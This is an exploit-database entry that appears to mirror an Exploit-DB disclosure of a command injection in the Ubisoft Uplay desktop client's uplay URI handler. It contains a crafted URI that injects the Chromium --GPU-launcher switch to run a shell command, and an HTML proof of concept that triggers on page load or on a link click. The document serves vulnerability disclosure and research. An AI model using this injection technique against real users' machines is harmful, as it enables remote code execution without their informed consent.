header-logo
Suggest Exploit
vendor:
Uplay Desktop Client
by:
Che-Chun Kuo
7.5
CVSS
HIGH
URI Parsing Command Injection
78
CWE
Product Name: Uplay Desktop Client
Affected Version From: 63.0.5699.0
Affected Version To: 63.0.5699.0
Patch Exists: NO
Related CWE:
CPE: a:ubisoft:uplay_desktop_client:63.0.5699.0
Metasploit:
Other Scripts:
Platforms Tested: Windows, Microsoft Edge
2018

Ubisoft Uplay Desktop Client 63.0.5699.0 – Remote Code Execution

The Uplay desktop client does not properly validate user-controlled data passed to its custom uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF) integrated within the Uplay client, allowing for arbitrary code execution.

Mitigation:

The vendor should validate user-controlled data passed to the uplay URI protocol handler to prevent command injection.
Source

Exploit-DB raw data:

# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A

# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom 
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF) 
# integrated within the Uplay client, allowing for arbitrary code execution.  

# Installing Uplay registers the following custom uplay protocol handler: 
# HKEY_CLASSES_ROOT
#	uplay
#		(Default) = "URL:uplay Protocol"
#		URL Protocol = ""
#			DefaultIcon
#				(Default) = "upc.exe"
#		Shell
#			Open
#			Command
#				(Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"

# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution: 

	'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'

# When a victim opens this URI, the string is passed to the Windows ShellExecute function. 
# Microsoft states the following: "When ShellExecute executes the pluggable protocol handler with a 
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will 
# be interpreted as part of the command line. This means that if you use C/C++’s argc and 
# argv to determine the arguments passed to your application, the string may be broken 
# across multiple parameters."
	
# "Malicious parties could use additional quote or backslash characters to pass additional command 
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on 
# the command line could come from malicious parties, and carefully validate them."

# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject 
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the 
# command line with a quote character and inserts a new switch called --GPU-launcher. Since the 
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows 
# the final command, which opens the Windows command prompt and executes the whoami program. 
	
	"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"
	
# Attack Scenario
# The following attack scenario would result in the compromise of a victim's machine with the vulnerable 
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a 
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge 
# is trying to open "UPlay launcher". After the user gives consent, the vulnerable application runs, 
# resulting in arbitrary code execution in the context of the current process.

# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against 
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape 
# illegal characters before passing the URI to the protocol handler.

# After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables 
# before the --GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService 
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear. 
# It should be noted, this UAC prompt doesn't prevent command execution from occurring. 
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No), 
# command execution will still occur once the code that passes the --GPU-launcher switch 
# to the CEF is triggered within upc.exe. 

# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge. 
# The first method triggers when the webpage is opened. The second method triggers when the 
# hyperlink is clicked by a user.

<!doctype html>
<a href='uplay://foobar" --GPU-launcher="cmd /K whoami &" --'>ubisoft uplay desktop client rce poc</a>

<script>
  window.location = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
</script>

Navigation

Suggest Exploit

Services By CQR